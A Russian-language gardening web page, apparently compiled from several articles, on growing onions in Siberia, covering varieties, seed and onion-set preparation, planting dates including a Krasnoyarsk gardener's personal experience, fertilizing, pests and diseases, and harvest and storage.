0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Посадка и выращивание лука в сибири

Поэтапное руководство по выращиванию лука из семян за один сезон без хлопот

Лук-репку выращивают не только из севка, но и из семян рассадным способом или прямым посевом в грунт. Это не самый популярный метод среди огородников, так как не всегда приносит ожидаемый результат. Если правильно подобрать сорта и соблюсти правила агротехники, богатый урожай будет обеспечен.

Выращивание лука из семян за один сезон

Вырастить лук в однолетней культуре — вполне реальная задача, если есть время и базовые навыки агротехнических работ. Обязательное условие для получения качественной продукции — сухая теплая осень. Только вызревшие и сухие головки будут храниться до конца зимы.

Какие сорта подойдут

Для семенного выращивания годятся далеко не все сорта. При их выборе ориентируются на такие показатели:

  1. Срок созревания — преимущество у раннеспелых, вегетация которых длится 90–100 дней.
  2. Рекомендованная районированность.
  3. Лежкость, если предполагается заготовка на зиму.
  4. Размер: мелкими считают экземпляры до 50 г, средними — от 120 г, крупными — до 400 г и выше. Последние дольше хранятся.
  5. Малозачатковые дают 1-2 луковицы, многозачатковые формируют гнездо из нескольких головок и много зеленой массы.

Наиболее популярные сорта российской и иностранной селекции:

  1. Эксибишен — голландский среднепоздний, луковицы крупные, по 500–600 г. Благодаря сочному сладковатому вкусу овощи идеально подходят для добавления в салаты. Хранится урожай 3-4 месяца. Культура устойчива к большинству заболеваний, адаптируется к погодным условиям любого региона.
  2. Ред Барон — дает ярко-пурпурные головки весом до 120 г. Вкус полуострый, сладковатый. Растение устойчиво к патогенам. Подходит для Центрального, Волго-Вятского, Центрально-Черноземного, Северо-Кавказского и Уральского регионов.
  3. Сибирский однолетний — раннеспелый универсальный сорт, так как выращивается на репку и перо, двух– и четырехзачатковый. Переносит холодный климат Урала и Сибири, подходит для хранения. Средний вес луковиц — 40–50 г. Овощи не стрелкуются.
  4. Шаман — дает скороспелые продолговатые луковицы по 50–90 г. Подходит для уплотненных посадок, выдерживает засуху. Овощи белые с красноватым оттенком, хранятся недолго.
  5. Кентавр — среднеспелый сорт. Плотные головки массой 60–90 г полуострые, подходят для хранения. Растение неприхотливо, устойчиво к заболеваниям, подходит для Волго-Вятского и Северо-Кавказского регионов.
  6. Фермер — ранний сорт универсального назначения. Районирован для Центрального региона, нетребователен в уходе. Луковицы острые на вкус, средняя масса — 80–110 г. Урожай хранится до весны.

Гибриды

Семена гибридов дороже, но цена оправдана высокими урожаями и минимальными трудозатратами. Наиболее востребованные растения:

  1. Альбион F1 — дает белые слабоострые луковицы весом 70–100 г. Среднеспелый, переносит непродолжительные заморозки и засуху, урожай хранится до зимы.
  2. Дайтона F1 — среднеспелый и засухоустойчивый гибрид, пригоден для хранения. Не подвергается розовой гнили и фузариозу. Репки круглые, массой 50–100 г, дают много зелени.
  3. Копра F1 — высокопродуктивный ранний гибрид, урожай хранится до следующего сезона. Средний вес луковиц — 30–40 г, вкус полуострый. Культура рекомендована для выращивания в Центрально-Черноземном и Дальневосточном регионах.
  4. Сангро F1 — позднеспелый высокоурожайный (274–300 ц/га) гибрид. Устойчив к болезням и засухе. Луковицы весят 60–150 г, нарастает большая зеленая масса.

Подготовка и проращивание семян

Выращивание лука рассадным способом позволит получить ранний урожай. Перед посевом семена проверяют на всхожесть. Для этого 15–20 штук заворачивают во влажную ткань на 12 дней, ставят в теплое место и периодически смачивают. Если проростков мало, сеют густо.

Непротравленное производителем сырье обеззараживают 1%-ным раствором марганцовки в течение 30 минут. Затем промывают и замачивают на ночь в теплой воде.

Важно! Хотя всхожесть сохраняется 2-3 года, лучше брать материал прошлого сезона.

Старые семена активируют в растворе стимулятора роста или алоэ (1 ст. л. сока на 1 ст. воды).

Подготовка тары и грунта

Под посев готовят рассадные ящики, кассеты и другую подходящую невысокую тару. Пикировку всходов в отдельные горшочки не делают.

Грунт используют готовый или делают смесь из равных частей дерновой земли, торфа и перегноя. Для обеззараживания проливают кипятком.

Посев

В подготовленную тару насыпают 6-7 см земли, слегка уплотняют и поливают. С расстоянием 5 см делают бороздки глубиной 1 см. Пинцетом раскладывают семена с интервалом 1–3 см м присыпают сухим грунтом.

Увлажняют из опрыскивателя, накрывают пленкой, в которой делают несколько отверстий, и ставят в темный угол с температурой +18…+25°С.

Уход за рассадой

Когда появятся первые всходы, укрытие убирают, растения подкармливают азотным удобрением. Чтобы лук образовал репку, его перемещают в более прохладное и освещенное место (+15…+17°С).

Сеянцы возрастом 7–10 дней прореживают, оставляя промежуток в 2-3 см. Грунт держат в постоянном увлажненном состоянии, но не переливают. Раз в 15 дней растения подкармливают комплексным удобрением для рассады. Отлично стимулирует рост раствор куриного помета в пропорции 1:10.

Совет! Чтобы лук не вытягивался и не истончался, обеспечивают досветку фитолампами. Световой день продлевают до 11–13 часов.

За 2 недели до высадки на грядку рассаду выносят на открытый воздух для закаливания. Сначала держат не более 10–15 минут, затем постепенно увеличивают время до целого дня.

Высадка в грунт

Через 2 месяца лук готов к пересадке. Если сделать это раньше или позже, растения плохо приживутся.

Грядку перекапывают с предварительным внесением компоста и комплексного минерального удобрения. Поверхность тщательно рыхлят, делают борозды глубиной 3 см и расстоянием между рядами 3–50 см.

Технология посадки:

  1. Рассаду отбирают высотой 13–16 см, крепкую, хорошо развитую с 3-4 настоящими листами.
  2. Саженцы вынимают пучками и опускают в воду, чтобы смыть землю.
  3. Корни подрезают на 2 см, а листья — на 1/3.
  4. Высаживают растения в предварительно политые ряды с интервалом 5–7 см (зависит от размера будущей репки). Углубляют в землю на 2-3 см.
  5. Посадки уплотняют, чтобы не оставалось пустот.
  6. Мульчируют мелким компостом.

Через 3 дня проводят первый полив. Междурядья рыхлят по мере надобности.

Безрассадный способ выращивания

Прямой посев в открытый грунт начинают после окончательного таяния снега. Грядки делают шириной 80–90 см и высотой 13–15 см, перекапывают с добавлением органики и мочевины.

Этапы выращивания:

  1. Семена предварительно замачивают на сутки в теплой воде или стимуляторе роста, просушивают до сыпучего состояния.
  2. Делают бороздки аналогично рассадному способу и поливают теплой водой.
  3. Сеют с расстоянием 2-3 см, засыпают землей и прихлопывают сверху.
  4. Мульчируют слоем компоста 3-5 см, укрывают пленкой или лутрасилом.

Первые всходы пробиваются на 10–12 день.

Дальнейший уход

По мере развития удаляют слабые растения и используют в качестве зелени к столу. Прореживание совмещают с прополкой и неглубоким рыхлением.

Поливают 1 раз в неделю водой из бака, на 1 м 2 достаточно 7–10 л. В сухую жаркую погоду частоту увеличивают до 3 раз. За месяц до уборки поливы сокращают, а за 2 недели — полностью исключают. Это способствует вызреванию луковиц и накоплению сухих веществ.

В период вегетации проводят несколько подкормок:

  • в первый раз вносят раствор птичьего помета или коровяка в соотношении 1:10, мочевину или нитрофоску;
  • в середине сезона используют комплексное удобрение;
  • в конце лета делают питательный полив с фосфорно-калийным составом.

К началу созревания луковиц азотные подкормки исключают, иначе рост замедлится в ущерб качеству.

Возможные проблемы, болезни, вредители

При продолжительной сырой погоде и температуре ниже +12°С наступают благоприятные условия для развития болезней и вредителей. К самым распространенным относят мучнистую росу, гниль шейки и донца, фузариоз и стеблевую нематоду.

Для профилактики следят за режимом полива, прореживают загущенные посадки и уничтожают пораженные растения. Возбудителей заболеваний подавляют 1%-ным раствором бордоской жидкости.

При обширных очагах поражения растения опрыскивают «Фундазолом», «Фитоспорином» или «Гамаиром» по инструкции.

Выращивание в теплице

Оптимальные условия для роста культуры в закрытом грунте:

  • равномерное и достаточное освещение;
  • наличие форточек для вентиляции;
  • налаженная система полива;
  • стабильная температура до +15°С.

Сбор и хранение урожая

Сигналом созревания служит массовое полегание и пожелтение перьев. Как правило, это время приходится на конец июля-начало августа.

В сухой теплый день лук выдергивают руками или выкапывают вилами. Урожай на несколько дней раскладывают одним слоем под навесом для просушки. Недозревшие экземпляры держат на солнце в течение 2-3 недель.

После этого обрезают перья так, чтобы остался хвост 3–5 см. Головки тщательно перебирают, отсортировывают больные и поврежденные. Мелкие подойдут для подзимнего посева.

Хранят урожай в ящиках, тканевых мешках или заплетают косами. В домашних условиях оптимальная температура для лука составляет +18°С в темном месте. В подвале острые сорта хранят при 0…3°С, сладкие и полуострые — при 0-…+1°С.

Преимущества и недостатки однолетнего выращивания

Главные преимущества:

  • выгода — семена обходятся гораздо дешевле и дают много посадочного материала;
  • возможность выращивания в северных регионах с коротким летом;
  • ежегодный урожай в конце сезона;
  • не происходит стрелкования;
  • простая подготовка семян к посеву;
  • экономия места на участке.

Недостатки:

  • выращивание более трудозатратное;
  • при безрассадном способе приходится много бороться с сорняками и прореживать всходы;
  • количество подходящих сортов и гибридов ограничено.

Для южных регионов подходят ранние и среднепоздние сорта. Выращивают лук любым способом, включая подзимний и ранневесенний посев. В средних и северных широтах однолетнюю культуру получают только рассадным путем.

Выращивание порея за сезон

Лук-порей выращивают рассадой или посевом в грунт. При выборе сорта ориентируются на климатические требования, так как период вегетации культуры составляет 150 дней и более.

Прямой посев в грядку применяют в южных областях, где нет опасности ранних заморозков. При рассадном методе семена сажают с конца февраля, но сеянцы пикируют в отдельные горшки. Ухаживают за растениями, как и за репчатым луком.

Сажают порей в ряды 15 см глубиной с расстоянием 20 см друг от друга. Когда стебель уплотнится, проводят окучивание. Всего за сезон делают 3–5 таких манипуляций, которые способствуют формированию луковицы на стебле.

Урожай хранят в подвале, во влажном песке.

Выращивание шалота

Лук-шалот близок по свойствам к репчатому, но отличается мелкими луковицами и сильной ветвистостью. Культивируют его преимущественно на зелень.

Для получения продукции за один сезон используют рассадный способ. В конце зимы семена сажают в ящики с крупноструктурным грунтом.

Важно! Обязательно проводят подкормки всходов органо-минеральным удобрением.

При формировании 3-4 листьев лук высаживают в грядки. Между растениями выдерживают промежуток 12–15 см, ряды располагают с интервалом в 20 см.

Убирают урожай со второй половины июля, когда листья начнут усыхать. Гнезда разделяют на головки, обрезают корни и стебель, просушивают. В погребе или квартире шалот хранят в сетчатых мешках в прохладном темном месте. Удобный способ длительного использования луковиц и зелени — заморозка.

Заключение

Выращивание лука за один сезон имеет ряд неоспоримых преимуществ. Способ выгоден и пользуется успехом в регионах с коротким летом. Правильный подбор сортов или гибридов и ранний посев рассады — основа будущего полноценного урожая и длительности хранения.

Когда садить лук в Сибири? Опыт сибиряка + Лунный календарь

Личным опытом посадки лука в Сибири делится Светлана Щербак из Красноярска:

«Чаще всего лук-репку в Сибири выращивают через посадку севка – маленьких луковичек, выращенных из семян годом ранее. Посадить лук севок несложно, главное – угадать со сроками.

Сроки посадки лука севка в Сибири

Здесь ведь какая сложность? Посадишь рано – рискуешь попасть под поздние заморозки, лук замерзнет и уйдет в стрелку, тогда луковицы хранить нельзя. Припозднишься – останешься без хорошего урожая, луковички не вызреют.

Когда рекомендуют садить лук севок в печатных и интернет-источниках:

Интернет-источники, в том числе сайты специализированных компаний, рекомендуют садить лук-севок в Сибири в начале мая, а точнее 5-10 мая . Мол, в это время и земля достаточно прогрелась (до 7-10 градусов), и возвратных заморозков можно не бояться.

Для нашей местности (30-40 км от Красноярска) утверждения спорные: дважды за последние 4 года последний снег таял после 12 мая. Было бы странно садить лук в снег.

Сроки по личному опыту:

Именно поэтому (из-за климатических особенностей Сибирского региона) мои сроки посадки отличаются от рекомендованных. Я сажаю севок в последнюю неделю мая . Действительно, в это время у нас еще не жарко (как правило), но сильных заморозков обычно уже не бывает.

Хотя однажды, пять лет назад, вторая половина мая выдалась крайне жаркой, сроки посадок пришлось серьезно сдвинуть и увеличить полив.

А вообще, в определении сроков посадки лука, как и в случае с другими культурами, лучше ориентироваться на погоду, микроклимат и почву участка, особенности местности (рельеф, защита от ветров). Например, наш участок расположен на открытом всем ветрам возвышении, температура всегда на 2-3 градуса выше, а снега и ветра значительно больше, чем на огородах в 500 метрах от нашего. Поэтому сажу все чуть позже, чем соседи (в том числе и лук севок).

Ориентируюсь так: снег растаял, почва слегка прогрелась и подсохла – садим картошку, а следом – лук севок.

Благоприятные даты посадки лука по Лунному календарю 2018 (для Сибири)

В Лунном календаре для центра Сибири на 2018 год благоприятными для посадки луковых указаны такие даты:

  • 1, 4-6, 9-11 и 31 мая,
  • 2, 6, 7 и 10-12 июня.

Для тех, кто ориентируется на Лунный календарь, видимо, подходящим сроком будет конец мая – начало июня .

Я не «в тренде»

: в Лунный календарь обычно не заглядываю, просто не занимаюсь посадками в новолуние и полнолуние (эти дни для посева и посадки считаются самыми неблагоприятными).

Выращивание лука севка в Сибири: Личный опыт

Каждый год я сажаю покупной лук севок, не люблю сеять чернушку. Поняла, что для моей семьи интереснее и выгоднее именно севок. За один летний сезон лук из семян в наших краях не вырастишь. Поэтому возделывают этот овощ в двухлетней культуре: в первый год получают маленькие луковички – севок, его высаживают на грядку следующей весной. Только к концу второго лета получают лук-репку.

Чернушка, как известно, всходит долго, первый месяц растет медленно. В это время уход самый трудоемкий: прополки, рыхление… А перышки такие крошечно-тоненькие! То еще «удовольствие»! Особенно с учетом того, что лука нашей семье нужно немало. При этом маленькие луковички еще ведь нужно вовремя убрать и правильно сохранить, выдержать точные температуру и влажность в течение всего периода хранения! Грамотное хранение севка — процесс трудоемкий и хлопотный. Ошибки чреваты:

  • высыханием,
  • поражением грибком,
  • загниванием.

Поэтому каждую весну мне проще покупать пару килограммов готового севка. Приобретаю где получится — в любимом специализированном магазине или на рынке. Почему-то севок неизвестного сорта, приобретенный на рынке, вырастает не хуже элитного, купленного в специализированной компании, да и хранится отлично.

Посадка

Гряду вскапываю глубоко – на 25-30 см. Удобрения на этом этапе не вношу, но стараюсь соблюдать севооборот и не садить одну культуру на одном месте два года подряд.

Перед посадкой луковички замачиваю в розовом растворе марганцовки и Инта-Вира (1 таблетка на полведра воды), выдерживаю пару-тройку часов. После этого севок не подсушиваю, высаживаю влажным.

Между луковичками соблюдаю расстояние около 10х10 см. Бороздки или ямки не делаю. Поступаю так: беру луковицу тремя пальцами и углубляю в рыхлую землю донышком вниз, примерно на глубину 2 фаланги пальцев. Сверху не присыпаю, но обильно поливаю.

Уход

Далее уход традиционный – прополка, рыхление, полив, подкормка.

Поливаю исключительно холодной водой. Так советовала бабушка, в этом ее поддерживает мама. А я считаю, что советы бывалых — исключительно полезны. Мама говорит (а она больше 50 лет занимается огородничеством в Сибири), что такой полив хорош для профилактики заболеваний. И правда: я не сталкивалась пока с серьезными проблемами при выращивании лука.

Прислушиваясь к советам из глобальной сети, рядом с луком сею морковку. Это соседство защищает лук от луковой мухи, а морковь – от морковной. На загляденье вырастают и морковь, и лук, что такое луковая или морковная муха – понятия не имею!

Удобрения

Минеральными удобрениями лучок не кормлю. Применяю только органическую натуральную подкормку, готовлю ее в 200-литровой бочке:

  • пара-тройка ведер травы-сорняка — подойдут мокрица, крапива, лебеда, марь белая, одуванчик, главное — чтобы не было корней и зрелых семян;
  • два ведра коровяка или ведро конского навоза; куряк (куриное гуано) не использую;
  • граммов 100 сырых дрожжей;
  • с полведра древесной золы;
  • заливаю все водой, чтобы закрывало массу на 5-10 см.

Если есть старое варенье или морс – кладем его туда же!

Жду, пока появятся пузыри, ежедневно перемешиваю. Через неделю-полторы можно применять.

Один литр получившейся жидкости выливаю в ведро чистой воды. Этим раствором поливаю лук, из расчета 10-12 литров на один квадратный метр посадки.

Удобрение вношу дважды, с промежутком в 12-15 дней, на влажную почву. Стараюсь, чтобы состав не попал на зеленые перья.

Последний этап выращивания

С середины июля полив и подкормки прекращаю. В первую декаду августа, за две недели до уборки, перо должно «лечь». В крайнем случае укладываю сама: просто пригибаю (подламываю) перья.

В наших краях считается, что убрать лук-репку нужно не позднее 18 августа , значит уложить перо важно не позже 4-5 августа.

Думаю, вырастить достойный урожай репчатого лука из севка в Сибирских регионах не сложно. Высадите вовремя севок в хорошо подготовленную землю, периодически поливайте и подкармливайте, а главное – любите каждую растюшку, и все получится !

Как посадить лук-севок в Сибири

Выращивание овощей на собственном участке гарантирует наличие свежих и безопасных продуктов. Как посадить лук-севок в Сибири? Особенности климата требуют иных подходов к культивации и подбору сортов. В обзоре мы разберем наиболее проверенные и эффективные моменты в разведении популярной специи.

Выбираем участок

Выращивание овощей в суровых погодных условиях требует от огородника максимум внимания. Одна ошибка приведет к полному уничтожению урожая, при этом не помогут даже самые стойкие сорта. Чтобы избежать ненужных хлопот, первым делом лучше найти для овощей подходящее место.

Перед тем как садить лук-севок в Сибири, следует знать одну его характерную особенность: культура предпочитает хорошо освещенные участки — грядки нужно разбивать в солнечном и проветриваемом секторе огорода. Растение плохо переносит кислотные почвы, поэтому их заранее защелачивают древесной золой или известью.

Место для овощей готовят с осени. Профессионалы перекапывают территорию с последующим внесением органических удобрений. Весной перед началом работ в грунт добавляют минеральные вещества (в граммах на 1 кв. м):

  • сульфат калия — 30;
  • аммиачная селитра — 20;
  • суперфосфат — 40.

Чтобы избежать распространенных болезней, стоит помнить о правилах севооборота. Огородники не советуют сажать лук несколько лет подряд на одном месте, а также после моркови и чеснока. Рекомендуемыми предшественниками являются:

Перед началом работ обязательно удаляют остатки сорных трав и культурных растений. Такая внимательность оградит от проблем в будущем. Если на участке овощи болели, тогда советуем с осени протравить грунт.

Сорта

Семенами вырастить очень крупные репки в условиях сурового холодного климата не получится. Тепличные разновидности подходят только для культивации на перо. Профессионалы рекомендуют использовать мелкий севок.

Сорта лука для Сибири — это крепкие растения, которые быстро формируют красивые головки. Селекционеры постарались и представили много интересных овощей. Самые популярные виды:

  • Юконт;
  • Сибирский однолетний;
  • Черный принц;
  • Сибирь.

Еще рекомендуем посадить стойкие урожайные гибриды:

Перед покупкой следует обращать внимание на форму и размер головок. Слишком крупные чаще всего дают много стрелок, поэтому рекомендуют приобрести маленькие и средние севки. Продолговатые луковички порадуют круглыми репками, а идеальным овалом могут похвастаться плоские сорта. Важно внимательно осматривать материал и читать описание, а не выбирать продукцию исключительно по фото.

Подготовка к посеву

Культивация овощей требует правильных предварительных мероприятий. При выращивании лука-севка в Сибири нужно обработать посадочный материал. Таким способом можно оградить растения от распространенных болезней.

В 5 л воды добавляют 2 ст. л. каменной соли. В этой жидкости замачивают репки в течение 24 часов, потом их перекладывают в слабый раствор марганцовки на 15 минут, после чего сразу высаживают.

Грибковые инфекции являются основным бичом лука, поэтому используют другой метод. Севок греют в воде 10 часов при температуре не выше 40°С, потом дезинфицируют 15 минут в слабом растворе медного купороса. Перед тем как сеять, материал опрыскивают стимуляторами роста.

Если нет желания долго прогревать луковицы, их можно опустить на четверть часика в водичку температурой 55°С, затем на такое же время — в холодную. В конце нужно обработать раствором марганцовки.

Весенние работы

Когда садить лук-севок в Сибири? В условиях сурового климата применяют несколько проверенных схем, но дружный полноценный урожай можно получить только при весенних работах. Мелкий посевной материал не дает стрелок, поэтому чаще всего используется для выращивания репок.

Май — это лучший месяц для проведения аграрных работ. Сроки колеблются в зависимости от прогревания грунта. Температура земли при посадке не должна быть меньше 8°С.

Грядки для семян разбивают по следующей схеме (в сантиметрах):

  • ширина — 100;
  • дистанция между рядами — 15;
  • расстояние между репками — 10;
  • глубина — 2.

Перед посадкой весной землю увлажняют, рыхлят и очищают от сорных трав. Для дезинфекции советуют полить лунки кипятком, а работы отложить на сутки. После того как мероприятия завершены, место тщательно мульчируют.

При выращивании семенами углубление зерен не должно превышать 2 см, при этом расстояние сокращают до 1,5. Работы проходят в одно и то же время. В сложных климатических условиях за один год не получится вырастить полноценные головки. Все всходы используют на перо.

Озимый лук

Когда сажают лук в Сибири? Некоторые огородники экспериментируют с устойчивыми к морозам сортам и сеют овощи осенью. Для этого подбирают материал, диаметр которого не превышает 3 см.

Первая декада октября — это лучший вариант для работ. В эти сроки исключается возможность позднего прорастания. Луковицы закапывают поглубже, не забывая после мероприятий о мульчировании опилками и соломой.

Сибирский климат осложняет выращивание репчатого лука осенью. Чтобы сохранить озимую посадку от ранних холодов, можно грядки с семенами покрыть толстым слоем хвойных лап. Чем выше укрепление, тем надежней спрятана репка. Такая осторожность защитит будущий урожай от вымерзания в малоснежные сезоны. Многолетние разновидности отлично адаптируются к зиме, а уже весной радуют огородников молодой зеленью.

Подкормки

До появления первых листиков работа на грядках ограничивается поливом по мере высыхания грунта. После того как на месте семян вылезут три перышка, можно приступить к более серьезным процедурам. Часто на этом этапе неопытные огородники совершают ошибки.

Внесение удобрений — это основной элемент в уходе за репчатым луком. В зависимости от того, что планируется вырастить, используются те или иные препараты. Органика применяется для выращивания на перо, а минеральные вещества станут незаменимыми для получения крупных головок.

Первая подкормка состоит из растворенных в теплой воде фосфатных и аммиачных средств. Аграрии рекомендуют применять готовые специализированные смеси, которые предназначены именно для этой культуры. Второе внесение проводят через месяц.

Избыток питательных веществ так же вреден, как и дефицит, поэтому нельзя регулярно «закармливать» репчатый лук. Перед процедурой рыхлят грунт, орошают, а уже потом используют удобрения. Если применять химические средства на сухую землю, тогда можно обжечь нежные корешки.

Как поливать репчатый лук? В условиях сибирского климата в первый месяц проводят процедуры один раз в неделю, потом сроки увлажнения увеличивают наполовину. В засушливое лето разрешают чуть добавить количество мероприятий.

За интенсивностью влаги больше всего следят весной. В этот период происходит формирование корневой системы и наращивание зелени. Избыток жидкости приведет к гниению и болезням, а недостаток — к голоданию. Негативное колебание обязательно отразится на вкусе репчатого лука.

Рыхление является важным элементом ухода. Культура не переносит дефицита кислорода, поэтому важно сажать овощи на почвы, которые хорошо пропускают воздух. Регулярная прополка позволит избавиться от сорняков. Лучший способ облегчить труд — это мульчирование грядки.

Болезни и вредители

Игнорирование правил ухода становится причиной того, что появляются инфекции. Избыток влаги в почве и высокая температура провоцируют возникновение фузариоза донца. Он поражает однолетний лук, в результате чего заложенные на хранение репки становятся мягкими и пропадают.

Мокрая бактериальная гниль появляется к концу вегетативного периода. Увидеть признаки можно только при разрезе головки. В течение нескольких недель овощи не проявляют симптомов болезни, но потом массово теряют товарный вид.

Ржавые «мозаичные» пятна на перьях — это споры грибка. По мере развития инфекции прекращается формирование наземных и подземных частей. Возбудитель зимует в растительных остатках и способен выдержать самые скрипучие морозы. Регулярное уничтожение сорняков и соломы позволит обезопасить грядки.

В конце мая луковая муха откладывает яйца под сухие чешуйки семян или в почву рядом с посевами. Через неделю голодные личинки проникают внутрь репки и постепенно поедают овощ. В течение лета выходит не менее 2-х поколений вредителей.

Чтобы избавиться от насекомого, проводят опрыскивания «Метафосом». В качестве мер профилактики рекомендуют посадить рядом морковь. Специфический аромат отпугивает муху.

Беловатые пятна на пере — это следы жизнедеятельности лукового трипса. Небольшой вредитель высасывает питательный сок из зелени, в результате чего листики засыхают и ломаются. Избавить от паразитов поможет подготовка семян к посадке и соблюдение правил севооборота.

Уборка урожая

Выкапывать лук нужно тогда, когда перестанет формироваться новая зелень. В этот период перья сохнут и лежат на земле. За несколько недель до завершительных процедур прекращают полив. Такая хитрость тормозит накопление влаги, которая провоцирует гниение во время хранения.

Лучший скороспелый сорт для Сибири успевает полностью вызреть и сформировать защитные чешуйки. Перед сбором урожая рекомендуют вырыть одну репку. Наличие толстой шейки и светлой шелухи говорит о том, что культура еще не готова к хранению.

Уборку проводят в сухую ветреную погоду. Копать нужно аккуратно, стараясь не повредить луковицы. Травмы и надрезы негативно влияют на лежкость продукции. Нельзя стучать головками о поверхность. Весь собранный урожай раскладывают для просушки на свежем воздухе. Чтобы ускорить процесс, в течение 2-х недель овощи вручную переворачивают.

Посадка семенами лука в Сибири — это важная и ответственная процедура. Наши рекомендации помогут определиться с выбором скороспелого сорта и научат, как правильно сажать севок в суровых климатических условиях.

Когда сажать лук севок в Сибири

В суровом климате Сибири вполне плодотворно выращивают овощные культуры. Одной из них является лук, который растет в огородах, как на перо, так и на репку. Здесь важно знать точные сроки, когда садить лук севок в Сибири для сбора максимального урожая. Рекомендуется внимательно отнестись к выбору сорта и агротехнике культуры.

Рекомендуемые сорта лука

В Cибири часто практикуют выращивание на огородах многолетнего лука. Это очень удобно с учетом климата данного региона. Самое лучшее время для посадки таких сортов – осень. Они отлично зимуют, даже в суровых условиях и уже с весны дают много зелени. В каждой лунке появляется несколько репок, они плотные, хоть и некрупные. На одном месте многолетние сорта оставляют на 4 года, затем луковица делится на части и высаживается на другом участке.

Еще в Сибири сажают семейный лук. Он назван так потому, что из одной луковицы появляется как бы еще «семейка» маленьких. Отличают семейный лук более высокие вкусовые качества, по сравнению с репкой, а также у него отсутствует характерный луковичный запах.

Лучше садить осенью

Чтобы получить урожай за один сезон, может использоваться рассада лука. Есть сорта, очень хорошо подходящие для такого способа, например, лук порей Эксибишен.

Стоит учитывать, что далеко не каждый сорт выживет в данном климате. В условиях холодов не удается получить крупные луковицы из семян, поэтому такой способ, как садить лук севок по весне в Сибири, очень широко распространен.

Сорта для теплиц, например, абсолютно непригодны для открытого грунта, из них получится только перо. Но есть большое число специальных сортов, отлично подходящих для климата Сибири и дающих большие урожаи: Юконт, Азерлос, Золотничок, Сибирский однолетний, Черный принц, Любчик, Кэнди Ф1, Дайтона Ф1.

Важно! Одно из самых главных правил культивирования лука в Сибири – верно подобрать его сорт.

При покупке лука под посадку рекомендуется придерживаться следующих правил:

  • луковки, имеющие продолговатую форму, в итоге вырастают в круглый лук;
  • посевной материал округлой формы в итоге дает плоские плоды;
  • лучше выбирать для посадки луковки среднего размера – маленькие могут не прорасти, а большие часто идут в стрелку.

Агротехника лука севка в Сибири

Климат данного региона имеет следующие особенности:

  • заморозки;
  • лето достаточно холодное, с дождями;
  • скачки температур;
  • периоды с сухой и жаркой погодой.

Если сеять лук семенами, то получается большее количество зелени, но чаще сажают все же луковичками. При посадке семенами полученный лук севок используют в следующем году. Почву под посадку подготавливают с осени. Это важно сделать, иначе можно остаться без урожая.

Удобряем почву перед посевом

Грядку тщательно перекапывают и вносят туда удобрения. Их тип зависит от желаемого результата. При желании получить перо удобрения должны быть в основном органическими. Это, например, навоз и куриный помет. Их разбавляют в пропорции 1:10 с водой. В большинстве случаев в Сибири лук севок растят для сбора на репку. При таком способе органика не нужна. Но необходимо делать фосфорные и калийные подкормки из расчета 30 г. на метр посевной площади.

Совет. Почвы лучше выбирать щелочные, суглинистые по составу. Если в земле под посадку повышенная кислотность, то используют доломитовую муку, золу или известь.

Важно соблюдать севооборот выращиваемых культур и точно знать, на какой грядке, что сажали за последние несколько лет. Репчатый лук лучше всего будет расти и плодоносить там, где в предыдущий год были посадки капусты, кабачков или бобовых. Не рекомендуют высаживать его на то же самое место, нужно сделать перерыв минимум в 4 года. Не лучшие предшественники для лука морковь и чеснок.

Сроки посадки

Чтобы понять, когда сажать лук в Сибири, необходимо отталкиваться от местных климатических условий. Правильно будет посадить его весной или осенью. Большинство сортов лука не могут нормально храниться в условиях суровой сибирской зимы – они поражаются гнилью или прорастают задолго до весны. Такая участь ждет в основном мелкие репки. Рекомендуется произвести их посадку в октябре, ближе к середине. До наступления заморозков они дают несколько перьев, а весной этот лук севок хорошо взойдет. Таким образом, сроки примерно одинаковы для всех регионов Сибири, на это надо ориентироваться, чтобы понять, когда сажать лук в районе Кузбасса. Собирать урожай в южных местностях начинают чуть раньше.

Однако обычно практикуется посадка лука в Сибири весной, таким образом можно получить больший урожай. Земля должна успеть прогреться примерно до 8С в слое толщиной до 15 см, тогда наступает время сажать лук севок. Это, как правило, происходит в период с 5 по 10 мая. В случае если посев произведен слишком рано, культура даст множество стрелок, и сама луковица не вырастет. Это удобно, если планируется употреблять овощ прямо с грядки, потому как храниться такой лук не способен. Многие садоводы используют для определения сроков посева лунный календарь, где указаны конкретные даты. Для северных регионов рекомендуется май месяц. На этот же календарь ориентируются при сборе урожая.

Интересно. По народной примете, посадку лука производят, когда начинает цвести черемуха.

При опоздании с посадкой луковицы вырастут маленькие. Происходит так, потому что фаза роста придется на более холодное время, вместо теплых летних дней, и луковица не успеет набрать хороший размер. Вот почему важно соблюдение точных сроков посадки лука севка в Сибири и не запаздывать с посевом. Соблюдение этих правил позволяет многим садоводам успешно возделывать данную культуру и получать большие урожаи.

Подготовка для посадки

В условиях сурового климата Сибири важным фактором является верная подготовка посевного материала. Лук севок в данном регионе часто болеет, вымерзает, но при хорошей предварительной обработке многих сложностей удается избежать.

Прежде всего, подготовка состоит в том, что еще осенью луку необходима тщательная просушка. Семена и луковички хранятся в больших банках или тряпичных мешочках в помещениях с температурой не ниже 0С и не выше 2С. При повышении температуры репка не вырастет, и лук уйдет в стрелку.

Несколько популярных методов подготовки луковиц к посадке:

  • На полведра воды кладут пару столовых ложек обычной соли. В данном растворе сутки вымачивают луковицы. После этого посадочный материал замачивают в слабом растворе марганцовки около 15 минут. Сажают без просушки;
  • Лук оставляют греться в воде, прогретой до 40С примерно на 9 часов. Можно чуть больше, по необходимости. Вода не должна остывать. После прогревания луковицы помещают в раствор марганцовки на 10 минут. Допускается заменить раствором медного купороса. Непосредственно перед самой посадкой возможна обработка стимулирующими рост средствами;
  • Более быстрый способ – опустить лук на четверть часа в подогретую до 55С воду, затем сразу на то же время в холодную воду. Не забыть обработать марганцовкой перед посадкой.

Во избежание поражения луковиц грибками их надо просушить не менее 20 дней при температурных показателях, близких к 25С. Перед посадкой в грунт необходимо прогреть лук и провести его дезинфекцию.

Совет. После обработки надо осмотреть посевной материал на предмет испорченных луковиц. Поскольку на грядку культуру сажают в порядке очередности: в начале большие, потом средние, а затем самые маленькие, необходима сортировка по размеру.

Если принято решение сеять лук семенами, то следует их правильно обработать. Проводят процедуру закаливания: опускают в воду 50С тепла на пару минут, затем в остывшую воду на такое же количество времени. После надо замочить семена в чуть подогретой воде на 24 часа, и вторым этапом оставить на 2 дня в холодильнике, не вынимая из воды. Перед посадкой в грунт нужны дезинфекция марганцовкой и обработка стимуляторами роста.

Посадка

